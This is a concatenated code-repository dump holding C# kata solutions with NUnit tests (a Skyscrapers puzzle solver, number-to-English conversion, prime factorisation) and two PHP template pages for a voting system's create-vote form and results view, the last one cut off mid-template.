                   + "   " + String.Join("  ", Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) + Environment.NewLine
                   + String.Join(Environment.NewLine, Skyscrapers.AllCells.Select(r => orderedClues.Pop() + " |" + String.Join("|", r.Select(c => c.PossibleValues.Count == 1 ? c.PossibleValues.First() == expected[c.X][c.Y] ? c.PossibleValues.First() + " " : c.PossibleValues.First() + "*" : "  *")) + "| " + orderedClues.Pop())) + Environment.NewLine
                   + "   " + String.Join("  ", Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) + Environment.NewLine
                   + Environment.NewLine + Skyscrapers.PrintValues()
                   + Environment.NewLine + "Difference index: " + DifferenceIndex(expected, actual)
                   + Environment.NewLine;
        }
        // First "row,col" where the two grids disagree, or "" when identical.
        private static string DifferenceIndex(int[][] expected, int[][] actual)
        {
            for (int i = 0; i < Skyscrapers.Size; i++)
            {
                for (int j = 0; j < Size; j++)
                {
                    if (expected[i][j] != actual[i][j]) return i + "," + j;
                }
            }
            return String.Empty;
        }
    }
    /// <summary>
    /// NUnit tests for 6x6 puzzles (they only pass when Skyscrapers.Size == 6).
    /// Diagnostics are borrowed from SkyscrapersTests4by4.
    /// </summary>
    [TestFixture]
    public class SkyscrapersTests6by6
    {
        [Test]
        public void SolvePuzzle1()
        {
            var clues = new[]{ 3, 2, 2, 3, 2, 1,
                1, 2, 3, 3, 2, 2,
                5, 1, 2, 2, 4, 3,
                3, 2, 1, 2, 2, 4};
            var expected = new[]{new []{ 2, 1, 4, 3, 5, 6},
                new []{ 1, 6, 3, 2, 4, 5},
                new []{ 4, 3, 6, 5, 1, 2},
                new []{ 6, 5, 2, 1, 3, 4},
                new []{ 5, 4, 1, 6, 2, 3},
                new []{ 3, 2, 5, 4, 6, 1 }};
            // Clues re-sorted into print order for the failure diagnostic.
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
        }
        [Test]
        public void SolvePuzzle2()
        {
            var clues = new[]{ 0, 0, 0, 2, 2, 0,
                0, 0, 0, 6, 3, 0,
                0, 4, 0, 0, 0, 0,
                4, 4, 0, 3, 0, 0};
            var expected = new[]{new []{ 5, 6, 1, 4, 3, 2 },
                new []{ 4, 1, 3, 2, 6, 5 },
                new []{ 2, 3, 6, 1, 5, 4 },
                new []{ 6, 5, 4, 3, 2, 1 },
                new []{ 1, 2, 5, 6, 4, 3 },
                new []{ 3, 4, 2, 5, 1, 6 }};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
        }
        [Test]
        public void SolvePuzzle3()
        {
            var clues = new[] { 0, 3, 0, 5, 3, 4,
                0, 0, 0, 0, 0, 1,
                0, 3, 0, 3, 2, 3,
                3, 2, 0, 3, 1, 0};
            var expected = new[]{new []{ 5, 2, 6, 1, 4, 3 },
                new []{ 6, 4, 3, 2, 5, 1 },
                new []{ 3, 1, 5, 4, 6, 2 },
                new []{ 2, 6, 1, 5, 3, 4 },
                new []{ 4, 3, 2, 6, 1, 5 },
                new []{ 1, 5, 4, 3, 2, 6 }};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
        }
        [Test]
        public void SolvePuzzle4()
        {
            var clues = new[] { 4,4,0,3,0,0,0,0,0,2,2,0,0,0,0,6,3,0,0,4,0,0,0,0};
            var expected = new[]{
                new []{ 3, 1, 6, 2, 4, 5 },
                new []{ 4, 2, 5, 3, 1, 6 },
                new []{ 2, 5, 4, 6, 3, 1 },
                new []{ 5, 6, 3, 1, 2, 4 },
                new []{ 1, 4, 2, 5, 6, 3 },
                new []{ 6, 3, 1, 4, 5, 2 }
            };
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                SkyscrapersTests4by4.ErrorMessage(expected, actual, orderedClues));
        }
    }
[TestFixture]
public class SkyscrapersTests7by7
{
static int [][] clues = new[]
{
new [] { 7, 0, 0, 0, 2, 2, 3,
0, 0, 3, 0, 0, 0, 0,
3, 0, 3, 0, 0, 5, 0,
0, 0, 0, 0, 5, 0, 4 },
new [] { 0, 2, 3, 0, 2, 0, 0,
5, 0, 4, 5, 0, 4, 0,
0, 4, 2, 0, 0, 0, 6,
5, 2, 2, 2, 2, 4, 1 }
};
static int [][][] expected = new[]
{
new[] { new[] { 1, 5, 6, 7, 4, 3, 2 },
new[] { 2, 7, 4, 5, 3, 1, 6 },
new[] { 3, 4, 5, 6, 7, 2, 1 },
new[] { 4, 6, 3, 1, 2, 7, 5 },
new[] { 5, 3, 1, 2, 6, 4, 7 },
new[] { 6, 2, 7, 3, 1, 5, 4 },
new[] { 7, 1, 2, 4, 5, 6, 3 } },
new[] { new[] { 7, 6, 2, 1, 5, 4, 3 },
new[] { 1, 3, 5, 4, 2, 7, 6 },
new[] { 6, 5, 4, 7, 3, 2, 1 },
new[] { 5, 1, 7, 6, 4, 3, 2 },
new[] { 4, 2, 1, 3, 7, 6, 5 },
new[] { 3, 7, 6, 2, 1, 5, 4 },
new[] { 2, 4, 3, 5, 6, 1, 7 } }
};
[Test]
public void Test_1_Medium()
{
int index = 0;
int[] clues1 = clues[index];
int[][] expected1 = expected[index];
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
[Test]
public void Test_2_VeryHard()
{
int index = 1;
int[] clues1 = clues[index];
int[][] expected1 = expected[index];
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
[Test]
public void Test_3_VeryHard()
{
int index = 1;
int[] clues1 = {6,4,0,2,0,0,3,0,3,3,3,0,0,4,0,5,0,5,0,2,0,0,0,0,4,0,0,3};
int[][] expected1 = {
new[] { 2, 1, 6, 4, 3, 7, 5 },
new[] { 3, 2, 5, 7, 4, 6, 1 },
new[] { 4, 6, 7, 5, 1, 2, 3 },
new[] { 1, 3, 2, 6, 7, 5, 4 },
new[] { 5, 7, 1, 3, 2, 4, 6 },
new[] { 6, 4, 3, 2, 5, 1, 7 },
new[] { 7, 5, 4, 1, 6, 3, 2 } };
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
[Test]
public void Test_4_VeryHard()
{
int index = 1;
int[] clues1 = {0,0,0,5,0,0,3,0,6,3,4,0,0,0,3,0,0,0,2,4,0,2,6,2,2,2,0,0};
int[][] expected1 = {
new[] { 3, 5, 6, 1, 7, 2, 4 },
new[] { 7, 6, 5, 2, 4, 3, 1 },
new[] { 2, 7, 1, 3, 6, 4, 5 },
new[] { 4, 3, 7, 6, 1, 5, 2 },
new[] { 6, 4, 2, 5, 3, 1, 7 },
new[] { 1, 2, 3, 4, 5, 7, 6 },
new[] { 5, 1, 4, 7, 2, 6, 3 } };
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues1[t.Item1]).Reverse());
Skyscrapers.Expected = expected1;
var actual = Skyscrapers.SolvePuzzle(clues1);
CollectionAssert.AreEqual(expected1, actual,
SkyscrapersTests4by4.ErrorMessage(expected1, actual, orderedClues));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/NumberToEnglish.cs
using System;
using NUnit.Framework;
namespace ConsoleApplication1
{
partial class Kata
{
public static string NumberToEnglish(int n)
{
if(n < 0 || n > 99999)
return string.Empty;
if (n == 0) return "zero";
if (n < 1000) return ProcessThreeDigits(n);
return ProcessTwoDigits(n/1000) + " thousand" + (n%1000 > 0 ? " " + ProcessThreeDigits(n%1000) : string.Empty);
}
private static string ProcessThreeDigits(int i)
{
if (i < 100 ) return ProcessTwoDigits(i);
return ProcessSingleDigit(i / 100) + " hundred" + ( i%100 > 0 ? " " + ProcessTwoDigits(i % 100) : string.Empty);
}
private static string ProcessTwoDigits(int i)
{
if (i < 10) return ProcessSingleDigit(i);
if(i < 20) return ProcessLessThan20(i);
return Process10Mulitiplier(i / 10) + (i%10 > 0 ? " " + ProcessSingleDigit(i%10) : string.Empty);
}
private static string Process10Mulitiplier(int i)
{
switch (i)
{
case 2:
return "twenty";
case 3:
return "thirty";
case 4:
return "forty";
case 5:
return "fifty";
case 6:
return "sixty";
case 7:
return "seventy";
case 8:
return "eighty";
case 9:
return "ninety";
default:
throw new InvalidOperationException("invalid input");
}
}
private static string ProcessLessThan20(int i)
{
i = i % 10;
switch (i)
{
case 0:
return "ten";
case 1:
return "eleven";
case 2:
return "twelve";
case 3:
return "thirteen";
case 4:
return "fourteen";
case 5:
return "fifteen";
case 6:
return "sixteen";
case 7:
return "seventeen";
case 8:
return "eighteen";
case 9:
return "nineteen";
default:
throw new InvalidOperationException("invalid input");
}
}
private static string ProcessSingleDigit(int i)
{
switch (i)
{
case 1:
return "one";
case 2:
return "two";
case 3:
return "three";
case 4:
return "four";
case 5:
return "five";
case 6:
return "six";
case 7:
return "seven";
case 8:
return "eight";
case 9:
return "nine";
default:
throw new InvalidOperationException("invalid input");
}
}
}
    /// <summary>
    /// Table-driven coverage of Kata.NumberToEnglish across its supported range,
    /// including the out-of-range empty-string case.
    /// </summary>
    [TestFixture]
    internal class Tests
    {
        [TestCase(-4, "")]
        [TestCase(0, "zero")]
        [TestCase(7, "seven")]
        [TestCase(11, "eleven")]
        [TestCase(20, "twenty")]
        [TestCase(47, "forty seven")]
        [TestCase(100, "one hundred")]
        [TestCase(305, "three hundred five")]
        [TestCase(4002, "four thousand two")]
        [TestCase(20005, "twenty thousand five")]
        [TestCase(6800, "six thousand eight hundred")]
        [TestCase(14111, "fourteen thousand one hundred eleven")]
        [TestCase(3892, "three thousand eight hundred ninety two")]
        [TestCase(99999, "ninety nine thousand nine hundred ninety nine")]
        public void BasicTest(int n, string expected)
        {
            Assert.That(Kata.NumberToEnglish(n), Is.EqualTo(expected));
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/PrimeDecomp.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
/// <summary>
/// Prime factorization kata: <see cref="factors"/> renders a number's prime
/// decomposition as "(p1**k1)(p2)..." with exponents of 1 omitted.
/// </summary>
class PrimeDecomp
{
    /// <summary>
    /// Returns the prime factorization of <paramref name="n"/>, e.g.
    /// factors(12) == "(2**2)(3)". Values below 2 yield an empty string.
    /// </summary>
    public static string factors(int n)
    {
        // Robustness guard: previously n == 1 threw (Aggregate over an empty
        // sequence) and n <= 0 never terminated.
        if (n < 2) return string.Empty;
        List<Pair<int, int>> primeNumCount = new List<Pair<int, int>>();
        primeNumCount.Add(new Pair<int, int>(2, 0));
        DecompNum(n, primeNumCount);
        // string.Concat is safe on an empty sequence and avoids repeated
        // reallocation, unlike the previous Aggregate over string +.
        return string.Concat(primeNumCount
            .Where(p => p.Count != 0)
            .Select(p => "(" + p.PrimeNumber + (p.Count > 1 ? "**" + p.Count : "") + ")"));
    }
    /// <summary>
    /// Divides <paramref name="number"/> down to 1, recording each prime's
    /// exponent in <paramref name="primeNumCount"/>, which doubles as the list
    /// of known primes used for trial division.
    /// </summary>
    private static void DecompNum(int number, List<Pair<int, int>> primeNumCount)
    {
        foreach (Pair<int, int> pair in primeNumCount)
        {
            pair.Count += GetFactor(ref number, pair.PrimeNumber);
            if(number == 1) return;
        }
        // Keep generating larger primes until the number is fully decomposed.
        do
        {
            Pair<int, int> nextPrimeNumber = GetNextPrimeNumber(primeNumCount);
            nextPrimeNumber.Count += GetFactor(ref number, nextPrimeNumber.PrimeNumber);
        } while (number != 1);
    }
    /// <summary>
    /// Finds the next prime after the largest one known, appends it (count 0)
    /// to <paramref name="primeNumCount"/> and returns it. Candidates are
    /// tested by trial division against all previously found primes.
    /// </summary>
    private static Pair<int, int> GetNextPrimeNumber(List<Pair<int, int>> primeNumCount)
    {
        for(int current = primeNumCount.Last().PrimeNumber + 1;; current++)
        {
            bool isPrime = true;
            foreach (Pair<int, int> pair in primeNumCount)
            {
                if (current % pair.PrimeNumber == 0)
                {
                    isPrime = false;
                    break;
                }
            }
            if (isPrime)
            {
                Pair<int, int> pair = new Pair<int, int>(current, 0);
                primeNumCount.Add(pair);
                return pair;
            }
        }
    }
    /// <summary>
    /// Returns how many times <paramref name="primeNumber"/> divides
    /// <paramref name="number"/>, dividing those factors out of it.
    /// </summary>
    private static int GetFactor(ref int number, int primeNumber)
    {
        int count = 0;
        while (number % primeNumber == 0)
        {
            count++;
            number = number / primeNumber;
        }
        return count;
    }
    /// <summary>Mutable (prime, exponent) pair; generic for historical reasons.</summary>
    public class Pair<T, U> {
        public Pair(T primeNumber, U count) {
            PrimeNumber = primeNumber;
            Count = count;
        }
        public T PrimeNumber { get; set; }
        public U Count { get; set; }
    }
}
/// <summary>Regression test for PrimeDecomp.factors.</summary>
[TestFixture]
public class PrimeDecompTests {
  [Test]
  public void Test1() {
    // 7775460 = 2^2 * 3^3 * 5 * 7 * 11^2 * 17
    int lst = 7775460;
    Assert.AreEqual("(2**2)(3**3)(5)(7)(11**2)(17)", PrimeDecomp.factors(lst));
  }
}
| d80a8aa7e1b51520f9ed10f121de60ed933989aa | [
"C#"
] | 20 | C# | gsach20/Kata | 4cada16378770d9df65608792f79a655fac49075 | 168424e1f3408a6f04764213c5818a0a51536ab5 |
refs/heads/master | <file_sep><?php
/**
 * "Create vote" (添加投票) page template.
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/11
* Time: 15:56
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>发起投票-投票系统</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<!-- Placeholder for interaction feedback messages (交互信息提示) -->
<div class="am-container">
</div>
<div class="am-g">
<div class="am-u-lg-3">
<span class="am-show-md-down"> </span>
<span class="am-show-lg-only"> </span>
</div>
<div class="am-u-lg-6">
<!-- Mobile layout (移动端适配) -->
<span class="am-show-md-down">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
发起投票
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">投票标题</label>
<input type="text" class="voteTitle" placeholder="请输入标题">
</div>
<div class="am-form-group">
<label for="doc-ta-1">投票介绍</label>
<textarea class="voteIntro" rows="5" id="doc-ta-1"></textarea>
</div>
<div class="am-form-group">
<label for="doc-select-1">最低等级限制</label>
<select class="voteGrade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-email-1">每人最大投票数</label>
<input type="text" class="voteNumber" placeholder="请输入每人最大投票数">
</div>
<div class="am-form-group">
<label>截至日期</label>
<i class="am-icon-calendar"></i>
<input type="datetime-local" class="voteEndTime" placeholder="请输入截至日期">
</div>
<div class="am-form-group">
<label for="doc-select-1">是否匿名</label>
<select class="voteAno" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ta-1">选项</label><span>(图片或者描述必有一项)</span><br>
<div class="option"></div>
<div><a class="am-icon-btn am-icon-plus"></a><a class="am-icon-btn am-icon-minus"></a></div>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7"><input type="text" class="voteCaptcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" />点击刷新</div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">发起投票</button>
</fieldset>
</form>
</span>
<!-- Desktop layout (PC端适配) -->
<span class="am-show-lg-only">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
发起投票
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">投票标题</label>
<input type="text" class="voteTitle" placeholder="请输入标题">
</div>
<div class="am-form-group">
<label for="doc-ta-1">投票介绍</label>
<textarea class="voteIntro" rows="5" id="doc-ta-1"></textarea>
</div>
<div class="am-form-group">
<label for="doc-select-1">最低等级限制</label>
<select class="voteGrade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-email-1">每人最大投票数</label>
<input type="text" class="voteNumber" placeholder="请输入每人最大投票数">
</div>
<div class="am-form-group">
<label>截至日期</label>
<i class="am-icon-calendar"></i>
<input type="datetime-local" class="voteEndTime" placeholder="请输入截至日期">
</div>
<div class="am-form-group">
<label for="doc-select-1">是否匿名</label>
<select class="voteAno" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ta-1">选项</label><span>(图片或者描述必有一项)</span><br>
<div class="option"></div>
<a class="am-icon-btn am-icon-plus"></a><a class="am-icon-btn am-icon-minus"></a>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7"><input type="text" class="voteCaptcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" />点击刷新</div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">发起投票</button>
</fieldset>
</form>
</span>
</div>
<div class="am-u-lg-3">
<span class="am-show-md-down"> </span>
<span class="am-show-lg-only"> </span>
</div>
</div>
<div id="response">
</div>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/addVote.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
<script>
var captchaUrl = "{:captcha_src()}";
var rootUrl = "{$Think.config.WEB_ROOT}";
var name = "{$user.name}";
var admin = "{$user.admin}";
var grade = "{$user.grade}";
</script>
</body>
</html>
<file_sep><?php
/**
* 结果界面
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/12
* Time: 23:30
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>投票结果-投票系统</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<span class="am-show-lg-only">
<div class="am-g">
<div class="am-u-sm-2"> </div>
<div class="am-u-sm-8">
<div class="am-container"> </div>
<section data-am-widget="accordion" class="am-accordion am-accordion-default">
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
标题
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.title}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
介绍
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.introduction}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
说明
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<table class="am-table am-table-bordered">
<tbody>
<tr>
<td>发起人</td>
<td>{$vote.create_name}</td>
</tr>
<tr>
<td>开始时间</td>
<td>{$vote.create_time}</td>
</tr>
<tr class="am-danger">
<td>截止日期</td>
<td>{$vote.end_time}</td>
</tr>
<tr>
<td>是否匿名</td>
<td>
{if condition="($vote.anonymity == 1)"}是
{else \} 否
{/if}
</td>
</tr>
<tr>
<td>每人最多投票数</td>
<td>{$vote.vote_number}</td>
</tr>
</tbody>
</table>
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
投票结果
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<div class="am-form-group">
<ul class="am-list am-list-static">
{volist name='optionList' id='option'}
<li>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-9">
<div class="am-input-group">
{if condition="($option.content == 'null0_')"}
<span>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{elseif condition="($option.img == 'null')" \}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
{else /}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{/if}
</span>
</div>
</div>
<div class="am-u-lg-2"> </div>
</div>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-10">
<div class="am-progress">
<div class="am-progress-bar am-progress-bar-success" style="width: {$option.percent}%">{$option.percent}%</div>
</div>
{if condition="($vote['anonymity'] == 0)"}
<div class="am-panel am-panel-default am-panel-success">
<div class="am-panel-hd">投票人</div>
<div class="am-panel-bd">
{foreach $optionLog[$option['id']] as $vo}
{$vo} |
{/foreach}
</div>
</div>
{/if}
</div>
<div class="am-u-lg-1"> </div>
</div>
</li>
{/volist}
</ul>
</div>
</div>
</dd>
</dl>
</section>
</div>
<div class="am-u-sm-2"> </div>
</div>
</span>
<!--移动端-->
<span class="am-show-md-down">
<div class="am-g">
<div class="am-container"> </div>
<section data-am-widget="accordion" class="am-accordion am-accordion-default">
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
标题
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.title}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
介绍
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
{$vote.introduction}
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
说明
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<table class="am-table am-table-bordered">
<tbody>
<tr>
<td>发起人</td>
<td>{$vote.create_name}</td>
</tr>
<tr>
<td>开始时间</td>
<td>{$vote.create_time}</td>
</tr>
<tr class="am-danger">
<td>截止日期</td>
<td>{$vote.end_time}</td>
</tr>
<tr>
<td>是否匿名</td>
<td>
{if condition="($vote.anonymity == 1)"}是
{else \} 否
{/if}
</td>
</tr>
<tr>
<td>每人最多投票数</td>
<td>{$vote.vote_number}</td>
</tr>
</tbody>
</table>
</div>
</dd>
</dl>
<dl class="am-accordion-item am-active am-disabled">
<dt class="am-accordion-title">
投票结果
</dt>
<dd class="am-accordion-bd am-collapse am-in">
<!-- 规避 Collapase 处理有 padding 的折叠内容计算计算有误问题, 加一个容器 -->
<div class="am-accordion-content">
<div class="am-form-group">
<ul class="am-list am-list-static">
{volist name='optionList' id='option'}
<li>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-9">
<div class="am-input-group">
<span class="am-input-group-label">
<input class="option" type="checkbox" value="{$option.id}">
</span>
{if condition="($option.content == 'null0_')"}
<span>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{elseif condition="($option.img == 'null')" \}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
{else /}
<span> </span>
<span>
<blockquote>
<p>{$option.content}</p>
</blockquote>
<img src="{$Think.config.WEB_ROOT}/public/uploads/{$option.img}" class="am-img-responsive" alt=""/>
{/if}
</span>
</div>
</div>
<div class="am-u-lg-2"> </div>
</div>
<div class="am-g">
<div class="am-u-lg-1"> </div>
<div class="am-u-lg-10">
<div class="am-progress">
<div class="am-progress-bar am-progress-bar-success" style="width: {$option.percent}%">{$option.percent}%</div>
</div>
{if condition="($vote['anonymity'] == 0)"}
<div class="am-panel am-panel-default am-panel-success">
<div class="am-panel-hd">投票人</div>
<div class="am-panel-bd">
{foreach $optionLog[$option['id']] as $vo}
